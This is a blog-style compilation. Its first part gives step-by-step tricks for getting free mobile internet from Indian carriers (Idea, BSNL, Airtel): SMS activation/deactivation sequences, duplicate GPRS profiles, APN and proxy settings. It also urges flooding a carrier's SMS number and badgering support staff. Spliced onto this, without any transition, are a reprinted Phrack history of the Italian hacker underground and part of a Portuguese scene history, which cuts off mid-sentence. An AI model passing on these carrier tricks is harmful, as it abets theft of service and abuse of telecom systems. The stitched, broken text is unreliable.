#2... YOU MUST NOT HAVE ANY ACTIVE PLANS OF GPRS/INTERNET !
#3... YOU MUST HAVE PREPAID CONNECTION !( USING OF THIS TRICK IN
POST PAID WILL LEAD TO YOU HIGHER AMOUNT OF BILL )
#4... YOU MUST HAVE TO USE S60 DEVICES OR HIGHER..NEVER USE THIS
TRICK FOR THE S40 DEVICES(FOR CERTAIN S40 DEVICES THIS TRICK
WORKS)
#5... THIS TRICK HAS BEEN TESTED SUCCESSFULLY IN NOKIA AND SONY
ERICSSON DEVICES !
NOW COME TO THE PROCEDURE TO GET FREE INTERNET:
From your idea cell phone type GP13 and send it to 4444.
now you will receive that your GP13 pack will be activated within
24 hours...
now wait for 12 to 16 hours..
now send the same sms to 4444..
you will receive that your request has been already registered.
now again after 24 hours you will find that your GP13 pack has
been activated...!!!
BUT that's not a trick...yes because you have been
charged 13 rs because of activation of GP13..
real trick starts now..
After successful activation of GP13 pack just send NOGP13 to
4444.(4444 No is free of charge)
you will receive that your GP13 pack will be deactivated within
24 hours..
now after just 10 to 12 hours of sending deactivation sms again
send GP13 to 4444..
now its enough ...you have completed your all steps to get free
internet..
it's because, due to the last activation sms coming after the deactivation sms,
the system will be hacked!!! The system isn't able to decide what to
do!!
now after some time of sending sms for activation just reboot
your system from file explorer..
now restart your device/cell..you are able to surf free..
but note that if you are using a cell phone then use opera mini or
uc web browser and if you are using a pc/laptop then use smart web
browser or opera 9.27.
if you wish to use a proxy for your opera then you must use
the proxies given below.....
BSNL hack for free Internet
here are the steps to perform:-
Logic: the server has a major bug in it, by which it fails to block two simultaneous connections from the phone and establishes a connection with full internet working.
Supported devices: all phones with multichannel gprs support
For connection on your mobile phone:-
1) Make two connections like bsnlportal and BSNLPORTAL1
(names of profile don’t matter, u can keep one as billgates and shahrukhkhan lol..the basic purpose of names is to enable the user to differentiate between the two accounts,)
2) Select the application you got to have the full connection working on.
Supposing “web”: now just select “bsnlportal” profile and select a link like wap.cellone.in, the page will get open, just press the red button such that the “web” application goes in the background.
Make sure that the gprs connection is still established with the web app. Two parallel lines on the top left of the screen will confirm this
3) Now open any other app that requires web connection like opera. Select BSNLPORTAL and open any other link like wap.google.com, u will get error –
the aim of using the other app is to perform multi-channel gprs,
this is verified by seeing some dots on the pre-existing connection established by “web”
(step 2)
“Access denied.
Technical description:
403 Forbidden - You are not allowed to communicate with the requested resource.”
4) close opera and open web and open a site like esato.com
5) if everything is done as said here then esato will load and voila! We have the whole internet!
For connection on pc.
1)create a connection and enter the number to be dialed as *99***1#
2) enter the following string as extra initialization command
3)now dial from pc, the connection will be established
4)pick the phone and open “web” open “wap.cellone.in” the phone shows error .
5) close “web” and then from the browser open www.google.com
and voila! The whole internet is here
settings for profiles
apn: celloneportal
ip: 192.168.51.163
port : 8080
leave other fields blank as they are of the least concern!
the browser settings on pc too go the same as mentioned above!
Airtel Hack for free internet
one
~cheers~
You need a PC or a Laptop and required connectivity tools ,ie.,
Serial/USB cable OR Infrared Device OR Bluetooth dongle
1) Activate Airtel Live! ( It's FREE so no probs)
2) Create TWO Airtel gprs data accounts (yep TWO)
and select the FIRST as the active profile.
3) Connect your mobile to the PC or Laptop and
install the driver for your mobile's modem
4) Create a new dial-up connection using the
NEW CONNECTION WIZARD as follows
Connecting Device : Your mobile's modem
ISP name : Airtel (or whatever you like)
Phone number :*99***2# / or try 99***1
Username and Password : Blank
5) Configure your browser and download manager to use the
proxy 100.1.200.99 and port 8080.9
My advice is to use opera since you can browse
both wap and regular websites)
6) Connect the dial-up account.You will be connected
at 115.2 kbps (but remember it is bad joke).
7) Pick up your mobile and try to access any site and try to
access any site.You'll get "Access Denied......"(except for Airtel Live!).
IT DOES NOT MATTER.keep the mobile down.
8 ) On the PC ( or Laptop) open your browser, enter any address ,
press ENTER and…….WAIT
9) After a few seconds the page will start to load and you have the
WHOLE internet at your disposal.
TWO
Under DATA COMM
~~~~~~~~~~~~
APN : airtelfun.com
USERNAME : blank
PASSWORD : blank
PASS REQ : OFF
ALLOW CALLS : AUTOMATIC
IPADDRESS :
DNSADDRESS :
DATA COMP : OFF
HEADER COMP : OFF
Under INTERNET PROFILES
~~~~~~~~~~~~~~~~
INTERNET MODE : HTTP or WAP (both worked for me)
USE PROXY : YES
IP ADDRESS : 100.1.200.99
PORT : 8080
USERNAME :
PASSWORD :
No Risk Here, Try it and Enjoy
Three
1st go to settings menu then to connectivity tab now choose the option Data comm. then "DATA ACCOUNTS" go to new account now the settings r as follows
ACCOUNT TYPE:GPRS
NEW ACCOUNT NAME:A1
APN:airtelfun.com
usr name: (blank)
password: (blank)
now save it
NOW!
go to Internet Setting in connectivity here choose internet profile--go to new profile setting are as below
NAME:A1
CONNECT USING:A1(which was created in data comm.)
save it
now u would be able to see it now select it and take "more" option then select setting here in use proxy option it will be selected no if it is no then change it into yes
now go to proxy address and give the address as
100.1.200.99 and then the port number as 8080
Usr name:
password:
now save all the settings u made . come back 2 connectivity
choose streaming settings now in connect using option choose a1 that we created leave the use proxy option as no itself
THESE R THE SETTINGS
now access airtellive! from ur activated SE phone goto VIDEO GALLERY OR VIDEO UNLIMITED(varies according to states) choose live streaming then choose CNBC OR AAJTAK WHILE CONNECTING TO MEDIA SERVER cancel AFTER 9 or 10 sec then type any web address if it shows access denied then once again select CNBC and wait for a few more sec than before if its fully connected also no prob its free then cancel it or if ur connected then stop it and the internet is ready to take off .GOOD LUCK SE AIRTEL USERS
alternate
For All Airtel Users
Requirements:
1. Airtel live (available 4 free)
2. Nokia series60 handset eg 6600,6630,n series,7610,6670 etc
3. Opera wap browser 4 mobile
Procedure:-
1. Go to ur connection settings and make a new internet profile using the default settings of airtel live. name that new profile as nething(for eg masala); change the home page of that profile to nething u like for eg www.google.com.
2. Go to ur Opera browser and set the default connection as AIRTEL LIVE. this is the original settings u received thru airtel.
3. Go to the services(in n6600) and Web(N6630) and change the default profile for connection as masala (newer one).
**Note: always make sure that ur access point is airtelfun.com
Apply:-
1. Open Opera and u will see that homepage of Airtel Live is opened. Minimize the application.
2. Now open web using the duplicate Profile and u will see that two gprs connections will work simultaneously and at the web or the services page it will show "Unable to connect" or any error. well thats the signal of ur success.
3. Simply go on the Opera with web on and open any site u want for free. No Charges No nothing.
U can also use it through ur computer..........
someone said dis too
The main principle behind this is we hav 2 fool the bsnl techies 2 activate portal and thus get gprs activated / get "G" signal on ur cell as bsnl portal (wap.cellone.in) needs "gprs signal on ur cel (whether gprs is formaly activated/registerd or not (by my method )i dont know)
NORMALLY THEY DONT DO THAT INSPITE OF THE FACT THAT THEY SHOULD ACTIVATE GPRS SIGNAL SERVICE FOR PORTAL!!!
AND THEY WILL GIVE U NO OF REASONS----
---THAT portal is message based , so go to cellone icon in menu and use that sms based portal (what the f**k)
---THAT portal service will be activated when u will activate gprs by filling up form and registering at nearest CCN!!
---THAT ur handset has some problems (if u say that "G" signal is not present)
----etc,etc!!
U HAVE 2 ACTIVATE PORTAL FIRST WHICH IS FREE AND U CAN EAT UP CC'S FOR THIS REASON!!
SO WHAT U HAV 2 DO IS--
1) SEND PORTAL to 3733 AND CONFIRMATION SHD COME WITHIN 5 MIN AT MAXIMUM !!
2) SEND FOR ATLEAST 20-30 TIMES (CAN B ANY MORE THAN THAT)
JUST S**K UP THE NETWORK(3733) WITH THESE MESSAGES !!!
THAT'S FREE NO!! BOTH ON POST AND PRE!!
3) NOW ALONG ALSO SEND 20-40 SMS AS GPRS TO 3733
(NO OF SMS DIRECTLY PROPORTIONAL 2 HATE FOR BSNL AND HOW EARLY U WANNA GET UR GPRS ACTIVATED) this is also free both on post and pre!!
4) U WILL GET CONFIRMATION IN BOTH CASES AND MSG TELLS U 2 GET SETTINGS FROM 9400024365, THE NO OF CC!!
HERE AT MY PLACE I CAN DIAL 9419024365 ALSO!
BOTH R TOLL FREE AND BOTH R LOCATED IN CHANDIGARH!!!
(((((((AND SOME OF THE CC'S SAY they cant give such sensitive information that where they r located, as if thay have a 3 rd world of their own! and the other dumbs said that they r in chandigarh!!!!)))))
I WOULD ADVISE ALL FIRST, 2 call them once 2 get the settings!!
(most of the times that is incorrect but gives u an idea of settings in ur area)
Try and in ur 1 st call only,
talk roughly and tell them u r calling 10-20th time just for settings and is that their service!!!
5) Now when u get them save them AND plz post them here!!!
6) now GET ATLEAST 2-3 COMPLAINTS REGISTERED( each after 1 day) THAT UR PORTAL HAS NOT ACTIVATED AND GET THEIR SERIAL NO.
and in the end bombard them abt the status of all those complaints !!
b4 registering ur complaint they will hesitate much and always say that they will b sendin new settings which r accurate! but dont believe them and just register complaints!!
7)AFTER THAT, u have 2 only wait until "G" signal is there on ur screen!!
LOOK, WHAT I HAVE WRITTEN ABV IS METHOD by which i got activated my "G" service !!! without fillin any form or such and without any money drain!!
may be since it bypasses the formal way of registration, that is why this trick is working !!!!!!!!!!!!
U may also Try this
first open ur msg window and type LIVE and send it to 2567 so that after 5 min u get the setting of Airtel Live or if u have already no need for this procedure.
now then open that setting and copy all the settings from it and create one access point manually which has all the settings like Airtel Live has.
now only one change will be there and it would be in access point name which is "Airtelmms.com" instead of originally "Airtelgprs.com".
ok u've done it just active that setting and access free airtel gprs on ur phone.
Friday, October 17, 2008
International Scenes 2008
--------------------------------------------------------------------------
An overview of the italian underground (1994-2007)
You did read about the Italian scene last time on Phrack #47 [0], just
a few months after the Italian Crackdown in 1994. This short article is
an attempt to sum up the evolution of the Italian underground since
those days.
1994 was the year of the so called Italian Crackdown (aka FidoBust): a
wide (and wild) Finance Guard operation nominally aimed at busting
warez BBS. A stunning total of nearly 200 BBS systems on the FidoNet
network were seized with irresponsible methods including, but not
limited to, the requisition of all electronic equipment from the sysops
(including modems, cables, keyboards, monitors, ...) as well as the
police sealing whole rooms.
In its first phase the purpose of the operation was to fight the illegal
market of copied software and to satisfy the BSA lobby this way. However
subsequent seizures and raids proved the crackdown also had a political
objective. The bust included BBS that belonged to CyberNet (a network
supporting the motto "INFORMATION WANTS TO BE FREE", populated by
hackers and cyberpunks alike, close to social centres), ECN [1]
(european network dedicated to broadening political debate and providing
counter-information about social themes and workplace politics) and
PeaceLink [2] (peace/ecologist association and network).
Though just a few BBS were really involved in sale of warez, a lot of
completely legal BBS closed to never open again as a result of the bust.
As new people were being busted, the national press gave its best at
building castles in the air about hackers and describing them as
software pirates or members of organized crime. The underground reacted
by striking at the credibility of the media with a round of actions signed
with the multiple-use name Luther Blissett [3]. The campaign used hoaxes and
communication guerrilla tactics to show how unreliable journalists were, and
even managed to have Mondadori, the second most important publishing
company in Italy, print the whole *fake* book "Netgeneration" (1996).
As a consequence of the crackdown the Italian underground started
feeling the need for an organization similar to the American EFF, able to
support hackers against abuses. In 1995 ALCEI Electronic Frontiers
Italy [4] was founded to "affirm and protect constitutional rights for
electronic citizens as new communications technologies emerge".
Nearly at the same time, Metro Olografix [5] was born, an association
made by people with a mixed range of skills and histories, from
cyberpunks and hackers to social volunteers, that nowadays counts about
80 members. The main mission of Metro Olografix is to spread the
telematics culture through the country supporting the old BBS spirit of
sharing, free communication and cooperation. Metro Olografix has an
office in Pescara for real life meetings and acts as a crossroads for
other groups and individuals to meet. Thanks to the esteem and trust
gained from the most part of the Italian underground, the association
was able to organize events like "L'hacker e il magistrato" ("The
hacker and the magistrate", from 1995 to 1999), a face to face
conference involving hackers, magistrates and press reporters, aimed at
communicating and making understand the difference between hackers that
follow hacker ethic and real criminals.
While BBS were still experiencing hard times, 1995 registered the
boom of Internet access in Italy - mainly thanks to the VOL ISP that
offered free promotional accounts, opened POPs in many cities reachable
with a cheap urban rate call and at the beginning even provided a
toll-free number. Internet access was no more limited to universities
and the opportunity to have a relatively fast, cheap and long lasting
Internet SLIP (later on PPP) connection from home marked the growth of a
new generation of young hackers. Those guys started to study and play
with TCP/IP protocols and they elected the Linux open-source operating
system and the C programming language as their favourite study matters.
Those wannabes were going to inject into the Italian underground new
ideas within a few years and to create some valuable projects and
groups.
Like the new generation, old-school BBS hackers too got very
interested in the communication opportunities offered by the Internet.
Thanks to "Isole nella Rete" [6] (the Italian for "Islands in the Net"),
the Internet connection of ECN, BBSs of the CyberNet circuit begun to
put their contents online. Message areas turned into mailing lists and
IRC channels like #cybernet were born on EFNet.
From 1987 to 1998 *the* fanzine of the Italian underground was Decoder
(published by ShaKe Edizioni Underground, a cyberpunk cooperative based
in Milan): covered subjects included hacking, hacktivism, networks,
cyberpunk culture, counter-information, leading figures and events from
the international scene, virtual reality and new technologies. While
Decoder was the only printed underground zine during those years, a few
hacking/phreaking e-zines were also released: The DTE222 Technical Journal
(1987) and The Black Page (1994); although those projects did not
last as long as Decoder and did not focus on the international scene, their
technical level was considerable.
In 1996 the first number of System Down was published, an e-zine
written by some users of IRCNet channels #cybernet and #hackers.it.
The quality and technical level of its articles dropped compared to
previous zines, because the authors were largely young guys who had started
hacking just after the Internet boom and were not very conscious of
hacker culture and the past works of the Italian underground.
Year 1997 saw a flourishing of new groups that lived hacking mostly as
study and research about programming, networks, operating systems,
instead of catching its political value and focusing on its
consequences for the society. In the beginning members of those
organizations were for the most part low skilled, but many of them were
highly motivated, tenacious, capable of learning quickly and they
reached a very good technical level in a very few years.
Orda delle Badlands was a crew especially dedicated to owning systems on
the Internet and to ircwar (a deplorable activity, but widely practised in
those times). The group burned out within a few years because its engine
was in fact the cooperation on actions launched by its
charismatic leader (who was nearly worshipped); in the long run that
proved to be an insufficient incentive, the crew closed and some of its
members joined other groups.
Antifork [7] (formerly known as disLESSici) more than a crew is a
'hackers research virtual lab', a place where hackers can share their
techniques and codes following open source and full disclosure
philosophies. Between Antifork members there are also creators of well
known tools like ettercap. Antifork software is available through their
website and public access CVS.
The S0ftpj [8] group reunited people with different skills and
backgrounds: cyberpunks, sysops, coders, virus writers, security and
privacy researchers, hardware and network experts. Since the beginning
the group stood out by its will to collaborate and confront
with other realities of the Italian underground (this explains the
notable amount of its releases distributed via its website). S0ftpj team
skills cover a wide range of fields - it has been contributing
to many events in the country holding workshops mainly focused on
its research in kernel hacking and new privacy enhancement technologies.
In the meanwhile, as these new groups were appearing, the fusion between
ECN/CyberNet hackers and the squat scene led in 1998 to the first
Hackmeeting [9], a yearly 3-day hacker con "without *organisers,
teachers, public and customers* but with *sharers*", held in a T.A.Z
[10] and totally self-organized. Although the level of its talks
is not always very high, Hackmeeting has become a unique opportunity to
have fun and discuss with people from different realities and feel the
informal atmosphere of old times - free of commercial influences. In
1999 the second Hackmeeting promoted the idea of "hacklabs",
laboratories mainly hosted by social centres where hackers could meet
in real to share and develop their do-it-yourself attitute and their
knowledge about programming, technologies, media activism, privacy and
cyber-rights. After Freaknet Medialab [11], the first Italian hacklab
and home of radio#cybernet, opened in Catania in 1995, other hacklabs
popped out in biggest cities of the country (Florence, Milan, Bologna,
Turin, Rome).
In spring 1998, when System Down stopped publication, S0ftpj and Orda
delle Badlands started a new e-zine called Butchered From Inside (BFi)
[12] that dealt with various topics (h/p, viruses, reversing, reports
from cons, underground culture, ethics) following a semi-disclosure
policy (no complete and ready-to-use exploits and tools, but
techniques). At first the technical level of the articles was low, but
it quickly improved and from its second year of life the zine already
distinguished itself by the originality and quality of its articles.
BFi documented the growth of new characters in the Italian scene; in
the course of time it adopted an acceptance policy for articles similar
to the one used by Phrack, and today it is also read by non-Italians
thanks to its English, French and Spanish translations. BFi is written
by hackers who belong to many organizations, by independent researchers
and, obviously, by S0ftpj members, who have been editing and
contributing during these years.
BFi has provided an example of the good spirit and built a virtuous
circle where new ideas and techniques, at first explained in the
articles, inspired other hackers to develop them further and publish
them in later articles. The feeling of a steady continuity between the
works of different contributors was great, so BFi launched successful
collaborations between hackers. In autumn 2001, BFi hosted an important
debate about a subject that had been in the background for a long time
but had not been discussed publicly yet: the feasibility of hacking
without political connotations. That topic of course was not exhausted
on that occasion and was going to resurface periodically; that
discussion anyway helped all parties to think about it and exchange
views with each other: "politicals" understood that a big effort in
experimenting with new techniques was becoming fundamental to fight
their battles efficiently, while "technicals" acquired a stronger
consciousness of their actions.
Sikurezza.org [13] has been another good project aimed at developing
discussions about computer security. It was established in 1999 with a
few open mailing lists, where advanced topics could be talked over by
hackers in a vendor-free, non-profit and full-disclosure atmosphere.
Unfortunately, in parallel with the dramatic increase in subscribers
and posters, the technical level of posts has progressively and
inevitably decreased through the years, although the list still
represents an important community, recognized also by the underground.
Moreover, researchers presenting themselves under the Sikurezza.org
umbrella set a new style and quality standard for security talks at
events held in Italy.
Other active hacking groups in those years were Spippolatori, Packet
Knights Crew and S.P.I.N.E.: some of them released interesting stuff
but they all eventually closed by 2005. There were also many attempts
to start new e-zines. Apart from OndaQuadra, which also contained a few
nice articles, quality was low and every new e-zine started talking
about hacking from a very basic level instead of learning from and
building on earlier editorial experiences.
New-school Italian phreakers have mostly been interested in studying
the PSTN/ISDN, phone kiosks and magnetic cards, cellular cloning and
VoIP. BFi published various articles on Fastweb, the biggest national
fiber optic ISP. Fastweb's Milan metropolitan network has been the
favourite playground for pioneering VoIP and IPTV hacking. Since 1998
the Spaghetti Phreakers [14] website and mailing list have been an
archive and meeting point to experiment and learn, and have contributed
to keeping alive the interest in phreaking among new generations.
The Italian underground counts talented reverse engineers and software
crackers; some of them have been members of renowned international
cracking groups or of the cracking university +HCU. Web sites like
Universita' Italiana Cracking [15] (resembling the teaching style of
+HCU) and 3564020356 [16] have been running for many years and provide
nice communities and huge archives of tutorials and technical documents.
RingZ3r0 and RACL were two other groups that published good textfiles
about reversing, but they are no longer active.
Italy is a country with a long and prolific artistic tradition and the
underground has got its own artists too. There have been many good demo
groups (for a comprehensive list, check the site Scene-IT [17]) and
some demo parties: "The Italian Gathering", organized by Metro
Olografix from 1996 to 1998 in Pescara; a demoscene area within
Codex Alpe Adria [18] (a wider event also featuring retrocomputing,
emulation and alternative systems) from 2004 to 2006 in Udine; and
since 2007 the HORDE [19] demoparty. Prof. Bad Trip [20] has been a
peculiar experimental artist capable of interpreting cyberpunk,
offering a visual perspective on themes like cyborgs, mutants,
polluted metropolises of a disturbed future and so on. It is worth
mentioning, in the end, the graphic novel "Uccidere un Hacker" [21]
(Italian for "Killing a Hacker") by Andrea Ferraresso, inspired by the
story of the German hacker Karl Koch.
In the field of privacy, a milestone was set in 1998 with the book
Kriptonite [22], written by hackers from ECN/CyberNet. Kriptonite
extensively covered the theory and practice of topics like
cryptography, anonymous remailers, nym servers, steganography, voice
encryption and packet radio.
Somehow influenced by Kriptonite, Progetto Winston Smith (PWS) [23] has
been working since 1999 to raise netizens' awareness of the risks of
technocontrol and network surveillance. PWS maintains a website
providing information about privacy enhancement technologies, for both
administrators and end users. Moreover, PWS organizes every spring in
Florence a free convention called E-Privacy [24]. The con runs in two
tracks where privacy-related topics are discussed at the legal and the
technical level; it also hosts the local ceremony of the Big Brother
Awards for the year's biggest privacy violators in Italy. Besides
E-Privacy there were other events about privacy and freedom organized
by Metro Olografix, like the Metro Olografix Crypto Meeting and Cyber
Freedom.
Autistici/Inventati (A/I) [25] was born in 2001 as a collective of
people from hacklabs and media activists, and its main effort has been
to build a server that offers free services like web/blog/mail hosting,
an anonymizer, an anonymous remailer and mailing list management for
activists and people desirous of privacy. The A/I server, due to its
policy devoted to free speech, had to be defended in court many times.
In summer 2005, A/I discovered that its server had been physically
compromised and that the Italian police had had access to its SSL keys
(which allowed them to decrypt and monitor all the traffic for a whole
year). The collective reorganized and deployed the so-called "R* Plan":
a fresh decentralized, redundant network infrastructure with servers
located in different countries and jurisdictions. As for any service it
provides, A/I made the technical documentation for the R* Plan [26]
available on its site.
Thanks to the work of PWS, A/I and individuals, Italy boasts various
Tor and Freenet nodes as well as anonymous remailers and nym servers.
Reading this short history so far, you, the reader, could argue that
the underground in Italy is very healthy, but unfortunately the
expression "zombie scene" used by Duvel in the last Phrack issue [27]
fits its real current status well.
An alarming fact is the large number of people once in the underground
who now collaborate with computer crime units or work for companies
providing malware and services to law enforcement agencies. These
people have largely contributed to the death of the underground in
Italy: even when they did not consciously fight other hackers, the lack
of trust and the paranoia acted as disintegrating forces against groups
and cooperation. The underground has shown not only that it is not
strong enough to refuse working for law enforcement, but that it is not
even able to isolate people who publicly claim to participate in and
belong to the underground while at the same time working for the
police.
Wounds are inflicted on the underground not only by those who
explicitly want to strike it, but also by entities willing to exploit
it. The Hacker Profiling Project (HPP) applies criminal profiling
methodology to enable analysts to identify the kind of attacker and to
anticipate his next moves. It tries to accomplish its goal by
collecting questionnaires from hackers and deploying honeynets.
Although HPP's creators, who are Italian, promote their work among
hackers stating they want to break stereotypes about the hacker
figure, this sounds a bit bizarre... their real goals are quite evident
to everybody. Zone-H [28] is another attempt to suck from the
underground while giving shit back to it. The archive of defaced
websites lacks the good spirit of the old Attrition.org, and the
primary purpose of the portal's activities is to keep the perception
of an evil hacker menace high in order to sell more ethical hacking
courses and services. The organization has been able to attract a few
young guys and exploit them in borderline actions (the founder has
been arrested in connection with the Telecom Italia spying scandal
[29]). It seems that in Italy the more people use the word "ethical"
the less they prove to really have an ethic.
Like everywhere, nowadays many Italian hackers are in the security
business and have stopped releasing their advances and works through
underground channels. The problem is not the fact that they speak at
commercial cons, but the limited amount (and sometimes the lack of free
access) of knowledge they usually provide at such events. Those people
largely made their bones inside the underground communities and they
learnt a lot from underground publications and releases. It is then
desirable that hackers working in the security field keep showing
their slides at cons but also give back to the underground what it
deserves, that is a detailed view of their research to let other
hackers study it, learn from it and improve (or thwart, this is part of
the game, sorry) it.
In this discouraging scenario the Hackmeeting community has always
managed to wake up a few months before the yearly meeting and make it
a nice event, but it has experienced difficulties in building
continuity of activities during the rest of the year between
consecutive meetings. The number of hacklabs in the country has also
decreased in recent years. In 2004 Metro Olografix organized MOCA, a
hacker summer camp run in Pescara that resembled the CCC camp and was
a great success. The experience is likely to be repeated in summer
2008. In recent times Net&System Security has stood out among
technical cons because of the medium-high quality of its talks; the
con is held every year in Pisa. Old groups appear dormant and only a
few public releases are published. BFi magazine, too, progressively
decreased its number of articles per year until 2006, but last year
marked an inversion of this trend that made room for hope of a renewal
of activity in the near future. A few new groups have released good
stuff but their names are not cited here because they are not
underground-only oriented: they also offer business solutions.
The Italian underground is still active, but most of the old hackers
keep a low profile and rarely make their work publicly available. Most
group and e-zine sites have been put offline by their staff, depriving
new generations of access to a part of the underground's history and
culture. The underground should exploit new web technologies to regain
its past visibility and influence (do "media saturation" and "cDc"
remind you of anything?) on young talents, to offer an alternative
perspective to the one proposed by the world of commercial security.
Hackers now employed in the ICT industry should understand the risks
of the underground's death and make an effort to spread the knowledge
coming from their research through underground vectors and methods,
taking back the advantages offered by review and comparison with the
community. Limits imposed by new laws and extended technocontrol will
hopefully act as a strong incentive for the underground to become more
united and reactive.
The hackers' role is to make the future more *free*, not (only) more
(IT) secure. Join the underground, keep working for and with the
underground if you care about your freedom, in Italy and everywhere.
[0] International Scenes
Phrack Magazine Volume Six, Issue Forty-Seven, File 21 of 22
http://www.phrack.org/issues.html?issue=47&id=21
[1] E.C.N. European Counter Network
http://www.xs4all.nl/~tank/ecn/
[2] PeaceLink
http://www.peacelink.it/
[3] Luther Blissett
http://www.lutherblissett.net/
[4] ALCEI Electronic Frontiers Italy
http://www.alcei.it/
[5] Metro Olografix
http://www.olografix.org/
[6] Isole nella Rete
http://www.ecn.org/
[7] Antifork
http://www.antifork.org/
[8] S0ftpj
http://www.s0ftpj.org/
[9] Hackmeeting
http://www.hackmeeting.org/
[10] Temporary Autonomous Zone
http://en.wikipedia.org/wiki/Temporary_Autonomous_Zone
[11] Freaknet Medialab
http://www.freaknet.org/
[12] Butchered From Inside
http://bfi.s0ftpj.org/
[13] Sikurezza.org
http://www.sikurezza.org/
[14] Spaghetti Phreakers
http://www.spaghettiphreakers.tk/
[15] Universita' Italiana Cracking (UIC)
http://www.quequero.org/
[16] 3564020356
http://3564020356.org/
[17] Scene-IT [!]
http://scene-it.untergrund.net/
[18] Codex Alpe Adria
http://www.0xaa.org/
[19] HORDE
http://horde.untergrund.net/
[20] Prof. Bad Trip
http://www.profbadtrip.org/
[21] Uccidere un Hacker
http://digilander.libero.it/code6502/
[22] Kriptonite
http://isole.ecn.org/kriptonite/
[23] Progetto Winston Smith
http://www.winstonsmith.info/
[24] E-Privacy
http://e-privacy.winstonsmith.info/
[25] Autistici/Inventati
http://www.autistici.org/
[26] Plan R* Orange Book
http://dev.autistici.org/orangebook/
[27] A brief History of the Underground scene
Phrack Magazine Volume 0x0c, Issue 0x40, Phile #0x04 of 0x11
http://www.phrack.org/issues.html?issue=64&id=4
[28] Zone-H
http://www.encyclopediadramatica.com/Zone-H
[29] Telecom-SISMI Scandal
http://en.wikipedia.org/wiki/SISMI-Telecom_scandal
---------------------------------------------------------------------
The Portuguese Scene
----------------------
(By Eurinomo and Quickzero)
- The evolution of the Internet
When the Internet showed up it was very expensive; even around 96/97 we
had to pay something like 1.50 Euros per hour to the ISP, plus around
1 Euro per hour to the phone company for a dial-up connection.
Some years later the Internet got cheaper, in fact free! ISPs started
racing to give away free dial-up accounts without any time limitation;
they even gave away CDs with already created accounts. Still, we had to
pay the phone company.
Around 2000/2001, ADSL and cable connections started showing up. They
were kind of cheap, around 35 Euros per month for a 512k connection,
plus 15 Euros per month for the phone line or cable. There were no time
limitations, only a traffic limit of around 3GiB. A lot of people
started showing up online; for most of them the Internet was a new
world. Some people started creating domestic servers, sharing
information, code and software.
Years later, 24Mbps connections were made public using ADSL2+, and they
cost just around 35 Euros per month in total, with a 60GiB traffic
limit, so people started to take advantage of this to trade games and
movies.
At the present date, OC connections are available to the public in the
capital (Lisbon); an OC connection, up to 60Mbps, costs around 50 Euros
per month.
In summary, we had a slow start on Internet service, but now we have a
kind of quick evolution.
- The evolution of technology
Technology has always been expensive; even now electronic parts are
very expensive, but computers are getting cheaper and cheaper.
I remember when I bought my first x86: it was a used Pentium-90 with
16MiB of RAM and a 1GiB HD, all inside a heavy big tower. It cost
around 700 Euros, remembering that it was a used computer and the
cheapest price I could find; the best computer around at that time was
a Pentium-133. A new computer (Pentium-133) cost around 2000 Euros.
Around 2000/2001, computers started to get cheaper and more people
started to buy them (at that time not many people had one).
At the present date, anyone can buy a good complete computer (or
laptop) for less than 400 Euros.
Only recently, with this cheap technology, has the documentation and
information of the government and other high entities met the digital
world; most of it is/was stored in handmade paperwork.
- The evolution of society
Portuguese people may have an extreme reputation for sailing and
discovering 'new worlds', but it seems that all this ended a few
centuries ago.
Nowadays, society is very stupid and ignorant; they started to lose the
pride of being Portuguese, the pride of the world not being enough for
everyone while still having half of it in their hands, the courage to
make discoveries, and ended up as people who are happy if they have
food on the table and a good reality show or soap opera on TV.
Society gives more value to someone who does something using the tools
of another person than to the person who made those tools. For example,
they consider an expert someone who unlocks mobile phones without
knowing what he is actually doing, without knowing what is behind it.
They give more importance to someone wearing a tie than to someone
dressed normally; they also give more importance to someone who doesn't
know what he is talking about but has a PhD or something than to
someone who knows a lot about what he is talking about but doesn't have
any diploma.
The term 'hacker' is not very popular in society; the last time it
appeared on TV was two years ago, in the form of an interview with
someone calling himself 'buzzybee'. He was only a script kiddie who did
some defacing and carding, was proclaiming himself a 'hacker' and
showed up on the news saying that he was able to get free stuff using
carding, that he had access to any site on the Internet and so on.
Everyone in the scene knew this kid's real name, phone, address and
age, even though he didn't have many problems with the police.
- The evolution of the scene
Finally, the part of most interest: the Portuguese scene is kind of
obscure; almost no one outside the scene knows what is in fact going
on. No one knows when the scene really started, since it started before
the boom of telecommunications; a guess goes around the 70s and 80s.
In the 90s some groups started to show up, groups like Kaotik, Pulhas,
Ironik and a few others; even an e-zine came up, called 'PT Zine', but
it died on the third release. Some of the groups still exist to this
day, but not much information comes out of them. Also, some
individuals started to show up in the form of hackers, crackers and
phreakers.
The most notorious groups were:
Pulhas: Founded in 1994 by Kennobi. This was the oldest Portuguese
group. It is actually 'dead' now, but it had its golden age in the 90s
with the numerous papers it wrote and the exploit/code database it
offered to the Portuguese mainstream.
Toxyn: Founded in 1996 by m0xx. This group is notoriously known for its
campaign against Indonesia, when East Timor was occupied by the
Indonesian military. The attack against the Indonesian IT
infrastructure was motivated by the ongoing abuses of Indonesian
military officers against the East Timorese people. Toxyn started its
campaign with this statement: "We hope to call attention to the
necessity of self-determination and independence of the people of
Timor, oppressed and violated for decades by the government of
Indonesia. We hope you give your full attention to this historical
step towards freedom; we ask that you help us fight the tyranny of
Indonesia occupying Timor." The campaign was started on 10/2/1997.
The fall of Toxyn began when m0xx accepted and gave numerous interviews
about the campaign and about the Portuguese hacker scene, exposing
plans and actions of the scene. The Toxyn group was helped by Savage, a
known Spanish hacker, who developed the exploit that Toxyn used to
break into the .ID servers.
KaotiK: Founded in 1997(??). They were a very active group in the
East Timor campaign, and hacked and defaced numerous .id websites. They
created the first e-zine about hacking & security for Portuguese
people. The e-zine was extinct after 3 editions. KaotiK reached its
fame in the Portuguese scene after a member disclosed some flaws in
various Microsoft products.
F0rpaxe: F0rpaxe was maybe the most mediatic group/'hacker'/troll, for
the worst reason. This character was responsible for the first major
attack against US .mil targets in 1999. The attacks were allegedly
carried out in retaliation for Federal Bureau of Investigation (FBI)
raids on suspected "crackers" in several U.S. cities. The attacks hit
various governmental and military webservers, including those of the
FBI, NSA and the Navy.
East Timor Campaign: This was one of the first major hacktivism
campaigns worldwide. Timor was under Portuguese administration until
1975; after the Portuguese government abandoned that country, Timor was
invaded by the Indonesian army, which oppressed, violated, raped and
murdered for almost 20 years. Various Portuguese hackers and groups
decided to begin a campaign to show the world the truth about the
Indonesian occupation of East Timor. The East Timor campaign started in
1997 and finished in 1999. Various Indonesian military, government and
corporate websites were defaced. The defacements were meant to make
everyone in the world aware of the illegal occupation of East Timor;
the mission was accomplished, the attacks were reported by the media
all over the world. The campaign finished when m0xx, the leader of the
